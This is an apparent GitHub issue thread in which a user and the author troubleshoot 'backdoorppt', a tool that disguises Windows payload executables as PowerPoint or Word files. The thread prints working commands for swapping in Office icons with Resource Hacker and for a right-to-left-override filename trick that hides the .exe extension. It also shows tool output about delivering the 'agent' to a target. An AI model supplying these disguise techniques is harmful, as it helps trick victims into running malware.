error while compiling.. about backdoorppt HOT 24 CLOSED

bug report: rename': No such file or directory

Do a check for me..

check if exist:

backdoorppt/output/backdoor.exe
or
backdoorppt/output/backdoor_ppt.exe

If the files are not present than possible causes are:

1 - you did not enter the payload.exe binary to be transformed.
    in "PAYLOAD TO BE TRANSFORMED" zenity-box  (full path location)
    and backdoorppt tool can not find the payload.exe to be transformed..
2 - 'PAYLOAD TO BE TRANSFORMED' its not a windows binary payload.exe

If the files are present than possible causes are:

1 - The 'Ruby interpreter' version its not compatible with the ruby command
      used by this tool "backdoorppt tool uses ruby 1.8.7 command syntax"

In that case: try using the 'BASH TRANSFORMATION' method insted

1º - edit 'settings' file and change the follow line:

BASH_TRANSFORMATION=NO
change it to:
BASH_TRANSFORMATION=YES

2º - save 'settings' file and run backdoorppt again

from backdoorppt.

Thanks for the reply, let me check:) brb

from backdoorppt.

not quite...
it means that your resourcehacker its not changing the payload icons...

Try to manually change the icons

replace $UpL by the full path of your payload to be transformed

wine /root/.wine/drive_c/"Program Files/"Resource Hacker"/ResourceHacker.exe -open $UpL -save /root/Desktop/Tools/backdoorppt/output/backdoor.exe -action addskip -res /root/Desktop/Tools/backdoorppt/icons/Microsoft-Excel.ico -mask ICONGROUP,MAINICON,

NOTE: settings file must be edited before runing bacdoorppt.sh rigth?

from backdoorppt.

well i have try just now the 4 diferent ways to build..
and everything works fine in my distro (kali rolling)...

it builds the 2 transformation methods (ruby or bash) using RH
and it builds the 2 transformation methods (ruby or bash) without using RH

from backdoorppt.

yea no idea.. im running kali 2. also, i will try to reinstall the GIT, maybe that will do something..

from backdoorppt.

the 2 above commands required an backdoor.exe
to be present in backdoorppt/output folder to be able to 'transform' the extensions..

in RUBY it requires:

backdoorppt/output/backdoor_ppt.exe
and then
ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'

in BASH it requires:

/root/backdoorppt/output/backdoor.exe
and then
mv backdoorppt/output/backdoor.exe  backdoorppt/output/NAME.ppt.exe > /dev/null 2>&1

from backdoorppt.

yap

from backdoorppt.

okido:)

from backdoorppt.

backdoorppt/output/ is empty..

When i run the script, it let me choose a .exe File via a Dialog.
After that, i need to choose win7 settings for Wine.

Than it gives me this:

`[⊶] Checking backend applications!
[☆] Ruby installation -> found!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...

The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
-e:1:in rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT) from -e:1:in

Icon select : Microsoft-Word-2016.ico
Final file  : /root/Desktop/Tools/backdoorppt/output/resumeexe.ppt
Tool Author : r00t-3xp10it (SSA RedTeam)

Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...

We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.

from backdoorppt.

edit 'settings' file and activate the BASH_TRANSFORMATION method..
BASH_TRANSFORMATION=YES

if dosent work in means that your resourcehacker
installed is not doing is job to replace payload icons ...

in that case edit 'settings' file and activate:
RESOURCEHACKER_BYPASS=YES

from backdoorppt.

It looks like everything goes perfect, but still nothing in OUTPUT:

`root@kalix:~/Desktop/Tools/backdoorppt# ./backdoorppt.sh

+-+-+-+-+-+-+-+-+-+-+-+-+---+
|b|a|c|k|d|o|o|r|p|p|t|:|1.5|
+-+-+-+-+-+-+-+-+-+-+-+-+---+
'Office spoof extensions tool'
Credits: Damon Mohammadbagher

[⊶] Checking backend applications!
[☆] Wine installation -> found!
[☆] Zenity installation-> found!
[☆] Xterm installation -> found!
[☆] Wine Program Files -> found!
[☆] Select [windows 7] from winecfg...

The ResourceHacker provided by backdoorppt tool
requires wine to be set to 'windows 7' version.

[☆] ResourceHacker.exe -> found!
[⊶] Working on backdoor agent!
[☆] Transforming backdoor agent -> done...
[☆] Change backdoor agent icons -> done...
[☆] Adding agent hidden extensions -> done...
[☆] Word doc builder (backdoorppt) -> done...
[⊶] Task over, Writing reports!

Icon select : Powerpoint-green.ico
Final file  : /root/Desktop/Tools/backdoorppt/output/testje.ppt.exe
Tool Author : r00t-3xp10it (SSA RedTeam)

Your backdoor agent its now transformed into one fake
word doc (ppt) remmenber that .exe extensions will not
be 'visible' under windows systems, because the system
default behavior its: NOT show hidden extensions...

We are now ready to start a handler (listener) and
deliver the transformed agent to the target machine.

`

from backdoorppt.

After a reboot, it seems to be working now!

from backdoorppt.

its working the 2 transformations methods now?
what are the 'settings' active in backdoorppt/settings file?

from backdoorppt.

Bypassing ResourceHacker..

from backdoorppt.

i got the .ppt.exe now in OUTPUT

from backdoorppt.

So that did the trick right?

from backdoorppt.

yea ofcourse.. But still nothing:)

from backdoorppt.

any idea why i also dont get to choose the extension choise anymore? (doc, excl, etc)

from backdoorppt.

btw.. is this the only "office spoof" tool u got? respect for this one afcorse!
But i was reading about a sillent doc exploit? Even not macro, u got any info about it?

from backdoorppt.

ahhh you have some issue in your file system...
because backdoorppt.sh only uses backdoorexe.ppt or backdoor.ppt.exe extension methods

backdoorppt.sh uses the follow command to embedded extensions (ruby method)
1 - mv ~/backdoorppt/output/backdoor.exe ~/backdoorppt/output/backdoor_ppt.exe > /dev/null 2>&1
2 - ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")'

Those two commands will not interfer in linux file system in any way...

about sillent doc exploit i have writen a post-exploitation msf module
to change macro sandbox warning dialog read it here:

from backdoorppt.

okido let me check:) Thanks man

from backdoorppt.

root@kalix:~/Desktop/Tools/backdoorppt/output# ruby -e 'File.rename("backdoor_ppt.exe", "resume\xe2\x80\xaetpp.exe")' -e:1:in rename': No such file or directory @ rb_file_s_rename - (backdoor_ppt.exe, resume‮tpp.exe) (Errno::ENOENT)
from -e:1:in <main>'

from backdoorppt.

ohh okay so choose the "backdoor" manual by placing it in the output folder

from backdoorppt.

Issue resolved .. resource hacker its working under wine 64 bits now ..

from backdoorppt.